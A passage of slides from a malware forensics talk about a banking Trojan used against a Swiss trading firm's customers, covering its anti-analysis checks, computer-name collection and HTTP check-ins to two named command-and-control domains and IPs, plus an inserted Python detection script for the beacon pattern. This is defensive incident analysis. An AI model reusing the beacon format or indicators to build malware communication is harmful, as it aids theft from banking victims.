The Reverse-Trojan also verifies the path from which it was run, and it checks whether the file C:\Documents.exe, C:\Documents and Settings\user\Desktop.exe or C:\Documents and Settings\user\Desktop\update2.exe exists in order to authorize or deny its own execution. It also checks for the registry key HKEY_CLASSES_ROOT\AppID\update2.exe. These are common practices among malware writers to help disturbing Reverse Engineers.

0x05 - Malware analysis

The Trojan then gets the compromised computer name by querying LSA and lists the C:\ drive before doing a recursive search of living files within its parent directory.

Getting computer and user names is also a common practice for Trojans, as they most often need to declare unique zombies on their C&C server to permit accurate communication with the Bot Herders.

0x05 - Malware analysis

The Trojan tried to send HTTP packets to 2 different servers:

After having redirected those IP addresses with ARP Poisoning and simulating an HTTP service, we can see the Trojan saying a kind of "Hello, I'm here" to those web applications.

0x05 - Malware analysis

The first server was probably aimed to offer an alternate route in case the second one was taken down. It actually forwarded its packets to greenchina.com.

0x05 - Malware analysis

The involved domains have existed for quite a long time. The serv.com and greenchina.com domains were respectively registered in November 1994 and April 2001. The IP addresses which received the suspicious GET requests, 211.119.134.197 and 218.145.65.200, respectively hosted 1'644 and 11 websites. Despite its parameters, the URL http://www.greenchina.com/?guid=UserName!COMPUTERNAME!00CD1A40 did not look so dangerous...
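The beacon shape shown above (guid=<user>!<computer>!<8 hex digits>) is a usable detection on the network side: the check-in looks like an ordinary GET, but its parameter carries the host identity the Trojan collected, and the same identity is sent to both servers. This added example, not part of the talk, runs that rule over a constructed proxy log; the destination domains are the two named on the slide, the client addresses, user and computer names are made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shape of the beacon seen in the case: guid=<user>!<computer>!<8 hex digits>
BEACON_GUID = re.compile(r"^[^!]+![^!]+![0-9A-Fa-f]{8}$")

# Constructed proxy log: "timestamp client method url status".
PROXY_LOG = """\
2010-10-08T14:02:11Z 10.1.2.33 GET http://www.greenchina.com/?guid=jdoe!WS-FINANCE-07!00CD1A40 200
2010-10-08T14:02:11Z 10.1.2.33 GET http://www.serv.com/?guid=jdoe!WS-FINANCE-07!00CD1A40 200
2010-10-08T14:03:00Z 10.1.2.40 GET http://www.example.com/index.html 200
2010-10-08T14:05:12Z 10.1.2.33 GET http://www.greenchina.com/?guid=jdoe!WS-FINANCE-07!00CD1A40 200
2010-10-08T14:07:45Z 10.1.2.51 GET http://intranet.example/portal?guid=6f1c2b3a-9d2e-4f00-8a11-000000000000 200
"""


def beacon_identity(url):
    """(user, computer, tag) when a guid parameter has the beacon shape, else None.
    A conventional GUID-looking value, as the intranet line carries, does not match."""
    for value in parse_qs(urlsplit(url).query).get("guid", []):
        if BEACON_GUID.match(value):
            return tuple(value.split("!"))
    return None


def find_beacons(log):
    """Group beacon-shaped requests by internal client. Several destinations for the
    same identity is the fallback behaviour described for the two C&C servers."""
    hits = {}
    for line in log.splitlines():
        ts, client, _method, url, _status = line.split()
        ident = beacon_identity(url)
        if ident is None:
            continue
        entry = hits.setdefault(client, {"identity": ident, "destinations": set(),
                                         "count": 0, "first": ts, "last": ts})
        entry["destinations"].add(urlsplit(url).hostname)
        entry["count"] += 1
        entry["last"] = ts
    return hits


def beacon_alerts(hits, min_count=2):
    """Clients that checked in repeatedly; a single hit may be a false positive."""
    return sorted(client for client, e in hits.items() if e["count"] >= min_count)
```

The same identity string reappearing across hosts is what makes the rule cheap to pivot on: one match gives the infected workstation name and the account in use.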

0x05 - Malware analysis

It visually reached a standard webpage. But there was hidden information.


0x06 - Conclusion

Finally, the target of this complex attack was not directly our client, but his own customers. For sure, it has also impacted Fedor-Trading. Once the website was compromised, everything happened really fast.

The attacks were initiated by an unfair competitor who afforded the services of the underground market. Both financial companies are present in Switzerland and abroad.

0x06 - Conclusion

So globally the attack implied:
- Malware Code Writing (dropper, downloader, Banking Trojan)
- 0-day Uncovering (Adobe Reader stack buffer overflow)
- Social Engineering (Forex Regulation)
- Web Attacks (Sh404Sef SQL Injection)
- And most probably money transfer

In fact, we are typically in a modern scenario of underground skills renting.


0x06 - Conclusion

This offers many business opportunities.

0x06 - Conclusion

Organised cybercrime exists in lots of countries, and a sophisticated underground economy has rapidly flourished these last years. But the huge majority of attacks involved China, Russia and Brazil.

0x06 - Conclusion

There is much less Hacking For Fun, and much more Hacking For Profit. Cybercrime has therefore become an enterprise with a thriving underground economy. New cybercriminals don't have to develop their own code. They can rent botnets and even purchase licensed malware that comes with its own tech support. Cybercrime is now developing and spreading faster than ever. So welcome to the World Wild Web. And happy Forensics! :)

\xC29900: RETN 99

Your questions are always welcome! frederic.bourla@htbridge.ch
